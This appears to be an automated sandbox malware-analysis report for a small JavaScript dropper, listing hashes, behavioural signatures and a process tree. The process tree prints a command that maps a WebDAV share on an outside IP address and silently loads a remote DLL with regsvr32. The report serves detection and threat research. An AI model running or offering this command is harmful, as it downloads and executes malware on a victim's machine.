Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
23/07/2024, 07:44
Static task
static1
Behavioral task
behavioral1
Sample
10225127452584925332.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
10225127452584925332.js
Resource
win10v2004-20240709-en
General
-
Target
10225127452584925332.js
-
Size
4KB
-
MD5
9b9bd29b5986624340bcdaed5660bf17
-
SHA1
bc4e4c57b2b7cf0d5480b2b3c26c05bb9b57efc2
-
SHA256
c324645c039e711d47c98dd7ab3d4f31a5c96b3d84aff7de6285687161339701
-
SHA512
6996f0b1760acd72a60deee04e1064ba65db04a7814b15b6fb55aaebadfb221f6e6083b6b01b3e9762765183d4cfb97755c78b2a8af611157ef7e6a85ca88111
-
SSDEEP
96:Qxnv7pKjNJj0TQf4lBQdn1HElBvfYY/2SA65jdAkEXMnd65jdYnHJ:wviJrT65ZAkL65ZYnp
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3028 wrote to memory of 2968 3028 wscript.exe 84 PID 3028 wrote to memory of 2968 3028 wscript.exe 84 PID 2968 wrote to memory of 2124 2968 cmd.exe 86 PID 2968 wrote to memory of 2124 2968 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\10225127452584925332.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\204172964725065.dll2⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:2124
-
-